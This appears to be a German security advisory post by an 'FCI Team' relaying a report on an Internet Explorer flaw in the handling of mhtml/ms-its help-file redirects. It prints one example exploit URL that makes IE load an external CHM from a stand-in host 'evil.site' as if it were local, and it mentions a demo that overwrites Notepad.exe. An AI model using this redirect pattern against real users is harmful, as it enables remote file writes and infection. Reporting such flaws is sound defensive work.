 |
Der nachfolgende Auszug zeigt erneut, daß die Verwendung des Internet Explorers als Client per se als Sicherheitsproblem angesehen werden muß. Alle aufsetzenden Webapplikationen, die eine solche Verwendung vorschreiben, erben diesen Sicherheitsstatus....
....
Bereits vor einigen Wochen hatte Thor Larholm auf eine kritische Schwachstelle des Internet Explorer im Umgang mit Hilfedateien hingewiesen. Mittlerweile sind konkrete Details zu dem Sicherheitsproblem veröffentlicht, und erste Würmer und Websites nutzen es aus, um die Rechner von IE-Anwendern zu infizieren. Zum Glück waren die ersten Exemplare recht ineffizient und fanden keine große Verbreitung.
Das Problem lässt sich auf einen simplen Redirect zurückführen. Gibt man in einer mhtml-URL eine Hilfeseite an, die nicht existiert, dann lädt der Internet Explorer eine zweite Hilfedatei und startet diese mit den Rechten der ersten. Existiert C:\foo.mht nicht, so öffnet
ms-its :mhtml:file://C:\foo.mht!http://evil.site/exploit.chm::exploit.htm
die externe Hilfedatei, als wäre es eine lokale. Diese kann dann unter anderem Dateien nachladen und Dateien auf dem lokalen Rechner überschreiben. Betroffen sind alle Versionen des Internet Explorer ab 5.0.1, von Microsoft gibt es bisher keine Stellungnahme zu dem Problem. Auf dem c't-Browsercheck von heise Security können Sie testen, ob Ihr System verwundbar ist. Eine harmlose Version der Demo legt lediglich eine neue Datei an, die "scharfe" überschreibt Notepad.exe und startet dieses Programm.
Siehe dazu auch:
Demo zu mtml-Redirects auf dem c't-Browsercheck
Details zur Schwachstelle auf SecurityFocus
...
mfg
Ihr FCI Team
Weitere Infos zum Thema Sicherheit und den FirstClass Inspector FCI finden Sie hier
RSWE übernimmt keine Haftung oder Garantie für die Aktualität, Richtigkeit und Vollständigkeit der auf dieser Internet-Site zur Verfügung gestellten Informationen und Software. Das gilt auch für den Inhalt anderer Internetseiten, auf die mittels Hyperlink verwiesen wird. RSWE ist für den Inhalt der Internetseiten, aufgrund einer solchen Verbindung erreicht werden, nicht verantwortlich und distanziert sich von allen rechtlich nicht zulässigen Darstellungen auf diesen Seiten.
Die Vervielfältigung von Informationen, Daten, Texten, Bildern und Grafiken oder Teilen hiervon, deren Verwendung für Handelszwecke oder Verwendung auf anderen Web-Sites bedarf der vorherigen Zustimmung durch RSWE.
FCI ist eine eingetragene Marke von RSWE.
| |